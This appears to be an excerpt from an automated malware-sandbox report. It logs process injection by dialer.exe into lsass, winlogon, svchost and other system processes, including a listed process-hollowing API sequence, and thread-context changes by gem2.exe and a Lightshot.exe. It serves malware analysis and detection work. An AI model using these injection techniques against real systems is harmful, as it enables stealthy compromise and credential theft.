Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 2A142790000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 195B6F30000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1428DCA0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 1B973730000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1DBFA540000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1D76CCC0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1A239D90000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 17CFA390000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 23FB7270000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1DF53B50000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 164E88A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 25177B50000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 28D5D340000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\sihost.exe base: 24EB5E10000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20859990000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1F153C20000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1D241D40000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 16FADAD0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\ctfmon.exe base: 20E03070000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 15204DB0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\explorer.exe base: 1200000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 175C5280000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dasHost.exe base: 1CE76AA0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 22EF1B30000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1C7F34F0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 261DE4D0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 22E74520000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 1B1A9D00000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 217AF8C0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\smartscreen.exe base: 226D8930000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 13E5E930000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1F844120000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 21197E30000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 223DC870000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 1B4698D0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 27234C50000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 28543540000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\audiodg.exe base: 2B684340000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1BE58920000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1F8362A0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\conhost.exe base: 20E3F2F0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 238A0910000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1E3DC7B0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2B9EDBC0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 1EFFF1A0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 2490F910000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WMIADAP.exe base: 2961B670000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WMIADAP.exe base: 2961BA20000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeCode function: 23_2_0000000140001C88 CreateProcessW,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,OpenProcess,TerminateProcess,23_2_0000000140001C88
          Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\winlogon.exe EIP: 5895273C
          Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\lsass.exe EIP: ADFC273C
          Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: DD59273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 589B273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: AE89273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: DE1A273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: CBB273C
          Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: E107273C
          Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 8C1D273C
          Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 97FD273C
          Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 652E273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: A27A273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 87DA273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: FB3C273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 567273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: C1F3273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: E3BC273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 3895273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 6E56273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 1FF7273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: F35273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 7957273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: A46273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 1311273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 8C58273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 5F1D273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 5D9C273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: AEC9273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: DC1B273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 8253273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: A6273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 66EB273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: FD9A273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: CEDB273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 4279273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: B6F3273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 8DCA273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 7373273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: FA54273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 6CCC273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 39D9273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: FA39273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: B727273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 53B5273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: E88A273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 77B5273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 5D34273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: B5E1273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 5999273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 53C2273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 41D4273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: ADAD273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 307273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 4DB273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 120273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: C528273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 76AA273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: F1B3273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: F34F273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: DE4D273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 7452273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: A9D0273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: AF8C273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: D893273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 5E93273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 4412273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 97E3273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: DC87273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 698D273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 34C5273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 4354273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 8434273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 5892273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 362A273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 3F2F273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: A091273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: DC7B273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: EDBC273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: FF1A273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: F91273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 1B67273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 1BA2273C
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\winlogon.exe base: 1E858950000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\lsass.exe base: 140ADFC0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 195DD590000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\dwm.exe base: 1160CB80000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\winlogon.exe base: 1E8589B0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\lsass.exe base: 140AE890000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 195DE1A0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\dwm.exe base: 1160CBB0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 257E1070000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1F28C1D0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1CA97FD0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1D2652E0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 254A27A0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 24B87DA0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 205FB3C0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1A205670000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 18EC1F30000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 25CE3BC0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 26238950000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 2786E560000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1611FF70000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 27C0F350000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1B279570000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1E70A460000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 22D13110000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 22C8C580000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 2825F1D0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 2AA5D9C0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 20BAEC90000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1D2DC1B0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1C782530000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\spoolsv.exe base: A60000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 24066EB0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1A3FD9A0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 181CEDB0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 2A142790000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 195B6F30000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1428DCA0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 1B973730000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1DBFA540000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1D76CCC0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1A239D90000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 17CFA390000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 23FB7270000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1DF53B50000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 164E88A0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 25177B50000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 28D5D340000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\sihost.exe base: 24EB5E10000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 20859990000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1F153C20000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1D241D40000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 16FADAD0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\ctfmon.exe base: 20E03070000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 15204DB0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\explorer.exe base: 1200000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 175C5280000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\dasHost.exe base: 1CE76AA0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 22EF1B30000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1C7F34F0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 261DE4D0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 22E74520000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\dllhost.exe base: 1B1A9D00000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 217AF8C0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\smartscreen.exe base: 226D8930000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 13E5E930000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1F844120000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 21197E30000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 223DC870000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 1B4698D0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 27234C50000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 28543540000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\audiodg.exe base: 2B684340000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1BE58920000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1F8362A0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\conhost.exe base: 20E3F2F0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 238A0910000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1E3DC7B0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 2B9EDBC0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\dllhost.exe base: 1EFFF1A0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 2490F910000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 2961B670000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 2961BA20000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: PID: 1028 base: 1200000 value: 4D
          Source: C:\Users\user\Desktop\gem2.exe | Thread register set: target process: 7888
          Source: C:\ProgramData\Screenshots\Lightshot.exe | Thread register set: target process: 7660
          Source: C:\ProgramData\Screenshots\Lightshot.exe | Thread register set: target process: 7724
          Source: C:\ProgramData\Screenshots\Lightshot.exe | Thread register set: target process: 7720
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\winlogon.exe base: 1E858950000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\lsass.exe base: 140ADFC0000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 195DD590000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\dwm.exe base: 1160CB80000
          Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\svchost.exe base: 1428DD00000
          Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\svchost.exe base: 1428DD00000
          Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\svchost.exe base: 1428DD00000
          Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\svchost.exe base: 1428DD00000
          Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\svchost.exe base: 1428DD00000
          Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\svchost.exe base: 1428DD00000
          Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\svchost.exe base: 1428DD00000
          Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\svchost.exe base: 1428DD00000
          Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\svchost.exe base: 1428DD00000
          Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\svchost.exe base: 1428DD00000
          Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\svchost.exe base: 1428DD00000
          Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 2490F800000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\winlogon.exe base: 1E8589B0000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\lsass.exe base: 140AE890000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 195DE1A0000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\dwm.exe base: 1160CBB0000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 257E1070000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1F28C1D0000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1CA97FD0000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1D2652E0000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 254A27A0000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 24B87DA0000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 205FB3C0000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1A205670000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 18EC1F30000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 25CE3BC0000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 26238950000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 2786E560000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1611FF70000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 27C0F350000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1B279570000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1E70A460000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 22D13110000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 22C8C580000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 2825F1D0000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 2AA5D9C0000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 20BAEC90000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1D2DC1B0000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1C782530000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\spoolsv.exe base: A60000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 24066EB0000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1A3FD9A0000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 181CEDB0000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 2A142790000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 195B6F30000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1428DCA0000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 1B973730000
